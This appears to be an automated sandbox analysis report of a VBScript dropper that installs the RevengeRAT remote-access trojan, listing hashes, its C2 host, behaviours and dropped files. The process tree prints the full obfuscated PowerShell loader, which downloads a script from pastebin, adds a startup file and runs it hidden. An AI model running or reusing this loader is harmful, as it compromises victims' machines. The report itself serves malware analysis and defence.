Overview

overview

10

Static

static

36884fba5e...98.vbs

windows7_x64

10

36884fba5e...98.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    157s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    19-02-2022 09:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    36884fba5e03e2bda056c5345d1e9e2af3d72860c116b0110c9a845fbeb68298.vbs

  • Size

    38KB

  • MD5

    0d16eafc2062d62ca907d9173306297e

  • SHA1

    8c276ce7589c6fe757206ba932fc8f15865869c1

  • SHA256

    36884fba5e03e2bda056c5345d1e9e2af3d72860c116b0110c9a845fbeb68298

  • SHA512

    1190ddc702ca46931a7e08aa0c0aeee59ba2f948cfc1301797e7400236f0cd30ed341fddb3f67105aafcba40b2cd710bb8244833ffdb92eb51724a4b4057b480

Score
10/10
revengeratclienttrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/8AjnXrD3

Extracted

Family

revengerat

Botnet

Client

C2

kimjoy.ddns.net:2021

Mutex

RXQLV8XYTDNHNSA

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

    trojanrevengerat
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36884fba5e03e2bda056c5345d1e9e2af3d72860c116b0110c9a845fbeb68298.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1936
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4868
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -WindowStyle Hidden -Command "IEX ([System.Text.Encoding]::UTF8.GetString(@(35,82,101,97,100,32,67,111,110,116,101,110,116,32,79,102,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,93,32,36,83,116,114,101,97,109,32,61,32,40,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,79,112,101,110,82,101,97,100,40,34,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,56,65,106,110,88,114,68,51,34,41,13,10,91,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,93,32,36,83,82,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,83,116,114,101,97,109,82,101,97,100,101,114,32,36,83,116,114,101,97,109,13,10,91,83,116,114,105,110,103,93,32,36,82,101,113,32,61,32,36,83,82,46,82,101,97,100,84,111,69,110,100,40,41,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,54,48,48,48,41,13,10,13,10,35,67,114,101,97,116,101,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,79,110,32,72,97,114,100,32,68,105,115,107,32,33,13,10,91,83,116,114,105,110,103,93,32,36,84,69,77,80,32,61,32,36,101,110,118,58,84,69,77,80,32,43,32,34,92,34,32,43,32,34,83,121,115,84,114,97,121,46,80,83,49,34,13,10,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,36,84,69,77,80,44,32,36,82,101,113,41,13,10,13,10,35,83,116,97,114,116,117,112,32,73,110,115,116,97,108,108,97,116,105,111,110,13,10,70,117,110,99,116,105,111,110,32,73,78,83,84,65,76,76,40,41,32,123,13,10,32,32,32,32,91,83,116,114,105,110,103,93,32,36,86,66,83,82,117,110,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,68,101,102,97,117,108,116,46,71,101,116,83,116,114,105,110,103,40,64,40,56,51,44,49,48,49,44,49,49,54,44,51,50,44,55,57,44,57,56,44,49,48,54,44,51,50,44,54,49,44,51,50,44,54,55,44,49,49,52,44,49,48,49,44,57,55,44,49,49,54,44,49,48,49,44,55,57,44,57,56,44,49,48,54,44,49,48,49,44,57,57,44,49,49,54,44,52,48,44,51,52,44,56,55,44,56,51,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,44,52,54,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,52,44,52,49,44,49,51,44,49,48,44,55,57,44,57,56,44,49,48,54,44,52,54,44,56,50,44,49,49,55,44,49,49,48,44,51,50,44,51,52,44,56,48,44,49,49,49,44,49,49,57,44,49,48,49,44,49,49,52,44,56,51,44,49,48,52,44,49,48,49,44,49,48,56,44,49,48,56,44,51,50,44,52,53,44,54,57,44,49,50,48,44,49,48,49,44,57,57,44,49,49,55,44,49,49,54,44,49,48,53,44,49,49,49,44,49,49,48,44,56,48,44,49,49,49,44,49,48,56,44,49,48,53,44,57,57,44,49,50,49,44,51,50,44,56,50,44,49,48,49,44,49,48,57,44,49,49,49,44,49,49,54,44,49,48,49,44,56,51,44,49,48,53,44,49,48,51,44,49,49,48,44,49,48,49,44,49,48,48,44,51,50,44,52,53,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,51,50,44,51,52,44,51,50,44,51,56,44,51,50,44,51,52,44,51,55,44,55,48,44,49,48,53,44,49,48,56,44,49,48,49,44,56,48,44,57,55,44,49,49,54,44,49,48,52,44,51,55,44,51,52,44,52,52,44,51,50,44,52,56,41,41,13,10,32,32,32,32,91,83,121,115,116,101,109,46,73,79,46,70,105,108,101,93,58,58,87,114,105,116,101,65,108,108,84,101,120,116,40,40,91,83,121,115,116,101,109,46,69,110,118,105,114,111,110,109,101,110,116,93,58,58,71,101,116,70,111,108,100,101,114,80,97,116,104,40,55,41,32,43,32,34,92,83,121,115,116,101,109,76,111,103,105,110,51,50,66,105,116,115,56,57,46,118,98,115,34,41,44,32,36,86,66,83,82,117,110,46,82,101,112,108,97,99,101,40,34,37,70,105,108,101,80,97,116,104,37,34,44,32,36,84,69,77,80,41,41,13,10,125,13,10,13,10,91,83,121,115,116,101,109,46,84,104,114,101,97,100,105,110,103,46,84,104,114,101,97,100,93,58,58,83,108,101,101,112,40,49,48,48,48,41,13,10,13,10,35,82,117,110,32,80,111,119,101,114,83,104,101,108,108,32,70,105,108,101,32,33,13,10,73,78,83,84,65,76,76,13,10,73,69,88,32,34,80,111,119,101,114,83,104,101,108,108,46,101,120,101,32,45,87,105,110,100,111,119,83,116,121,108,101,32,72,105,100,100,101,110,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32,36,84,69,77,80,34)))"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy RemoteSigned -File C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
          4⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4728
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1aq4uvcf\1aq4uvcf.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4848
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB841.tmp" "c:\Users\Admin\AppData\Local\Temp\1aq4uvcf\CSC8F3D68601C9F4C3C8C610F95E93FDA7.TMP"
              6⤵
                PID:700
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              5⤵
                PID:424
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                5⤵
                  PID:376
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
          1⤵
          • Drops file in Windows directory
          • Suspicious use of AdjustPrivilegeToken
          PID:4236

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Web Service

        1
        T1102

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          MD5

          c163ab439d3c5ab9abff81272c463c19

          SHA1

          3f87e709ce5e2b8a4eed5dd1c9f4252549b0b94f

          SHA256

          4dbf858a84ae2a2ff8368e49a188c61d41606da2ce8aece245f70f787029ff5a

          SHA512

          473f1ee75bcd06a2f53b3b4605a4805c9b1fca5b3b87080d9708308a426cb4b8e81543a982f9c94d2fb5a1101f264e0533663cb471035e83e1abf4126d91ec79

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          MD5

          a703d9d529b6cd4b6a653b3bc9dd41da

          SHA1

          ca4517b79a71786cbdec2c3806c8713a3547f5b1

          SHA256

          67c578311a499b2780d4b682d7faa581c3bfd4c4260fdba8395a0dc98fa3b0af

          SHA512

          302ae6062735b8035b27873dd2f4d4ffea3fc2d371311d41686582829701d5873c949f00367db38116b8872eda4053b13291650dd24f09a543649f3c2a28b81d

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\1.bat
          MD5

          b5870c9131ef96fa9da1c0828fc5660f

          SHA1

          96e7ab6a3bfb21d58966a16bd70c5ab5248bcfed

          SHA256

          8b6dbd7728407ce50e813a7207dbea18709200c452b89e39514abc2e38f76b06

          SHA512

          dfa17e2017ad3c7bc2cf0c76d2558e8c92f14ef0cb1277a1459653ca36438d3daad9796361fa2a6f06df0d5eafbbe79d35dec6830004bc3088a4786360df2542

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\1aq4uvcf\1aq4uvcf.dll
          MD5

          e3a47d48f6d99615432cf417d449aa84

          SHA1

          57ab454273742fc363276b5499b903473cd344c4

          SHA256

          1c1bb7f6d8d7bd08dd20b9049f4926fc00e2176e2d8947d8c68fb7077e367746

          SHA512

          e39b1f69ec64abc7da04520f2df300153e45312d20cc5923103ae182aaebabba3c3240bcfdfa8554242dfb0facd30a26683699d42caebe4bc1be8ea538f47555

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\RESB841.tmp
          MD5

          83ea24321370eb0c39e6667feb804c3a

          SHA1

          b1a08bdaf6b2fc07d30ea08659ce3ad73b469d24

          SHA256

          bdf4ed8f824821b0042bf6de95ee6f9a25389d8685d01312b841e5940c407ffa

          SHA512

          b88e732bba20ac0071ddadd2f977ed25a5c3b4c7b24030163ee0ec45578ad9a57de22e13596eee15770862e2f391bf2fe96ecf05c3fa083306cff6cbfcbc9289

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\SysTray.PS1
          MD5

          c3a085139e8656f1b19f51d7994ecdde

          SHA1

          892232ef2b63b20ab0572957373a0fee56c58eb9

          SHA256

          a0b8635c9a7ed11f8d279bdbe0e368908ffd31a5caeb7fc9ae491f86347b4c6b

          SHA512

          58583e9e5d6c04f5e267097be02515690ba26c98d2f5afa858a2209c5d973c2b69630341e513fdc3a3fe5d8f4ba96955a8c07d45d750ca2da66b34d32db26041

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\1aq4uvcf\1aq4uvcf.0.cs
          MD5

          e03b1e7ba7f1a53a7e10c0fd9049f437

          SHA1

          3bb851a42717eeb588eb7deadfcd04c571c15f41

          SHA256

          3ca2d456cf2f8d781f2134e1481bd787a9cb6f4bcaa2131ebbe0d47a0eb36427

          SHA512

          a098a8e2a60a75357ee202ed4bbe6b86fa7b2ebae30574791e0d13dcf3ee95b841a14b51553c23b95af32a29cc2265afc285b3b0442f0454ea730de4d647383f

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\1aq4uvcf\1aq4uvcf.cmdline
          MD5

          a0ed9752152ac02898720b8af1012667

          SHA1

          7a431c2792b3fc5eae8948a0e352a6443ee02889

          SHA256

          730e8f50a218dab1291b452fa8be3d0b7edc0861df115489115c4836f21f6e69

          SHA512

          5c7844d1c2dd35474134a3e99c6d1d004de953aabdcbae08049697a490d18b31994452fee274ae90f63db541a07ff0d1c8753c621bdb4a052f4c2ff4d2f13ecc

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\1aq4uvcf\CSC8F3D68601C9F4C3C8C610F95E93FDA7.TMP
          MD5

          98c341ad726edc54b9697d19b706b7ca

          SHA1

          49f2aac75b5efaa96770518554d35e666293a6bd

          SHA256

          be5a9b9ac6d44421cb9d9c86da9a218f711f8d050274ba62c9a096b55bfce603

          SHA512

          f73a57e1fb07efddb2274000ee5753f9466d674762f2e027f5cef18c2a213699def041fa0a5ea3061a76ed63043c08a8054be9e919bd95561b4b2c0cb7c02d99

          Download Submit
        • memory/376-150-0x0000000000400000-0x000000000040A000-memory.dmp
          Filesize

          40KB

          Download
        • memory/376-155-0x0000000005500000-0x000000000559C000-memory.dmp
          Filesize

          624KB

          Download
        • memory/376-154-0x000000007510E000-0x000000007510F000-memory.dmp
          Filesize

          4KB

          Download
        • memory/376-153-0x0000000005960000-0x0000000005F04000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/376-156-0x00000000054F0000-0x00000000054F1000-memory.dmp
          Filesize

          4KB

          Download
        • memory/1700-132-0x00007FF8F1AC3000-0x00007FF8F1AC5000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1700-133-0x0000018F40600000-0x0000018F40602000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1700-134-0x0000018F40603000-0x0000018F40605000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1700-135-0x0000018F40606000-0x0000018F40608000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1700-131-0x0000018F40610000-0x0000018F40632000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4236-144-0x0000018B61D90000-0x0000018B61DA0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4236-145-0x0000018B62420000-0x0000018B62430000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4236-149-0x0000018B64B10000-0x0000018B64B14000-memory.dmp
          Filesize

          16KB

          Download
        • memory/4728-137-0x0000022379A30000-0x0000022379A32000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4728-136-0x00007FF8F1AC3000-0x00007FF8F1AC5000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4728-141-0x000002237BC30000-0x000002237BCA6000-memory.dmp
          Filesize

          472KB

          Download
        • memory/4728-138-0x0000022379A33000-0x0000022379A35000-memory.dmp
          Filesize

          8KB

          Download
        • memory/4728-140-0x0000022379A36000-0x0000022379A38000-memory.dmp
          Filesize

          8KB

          Download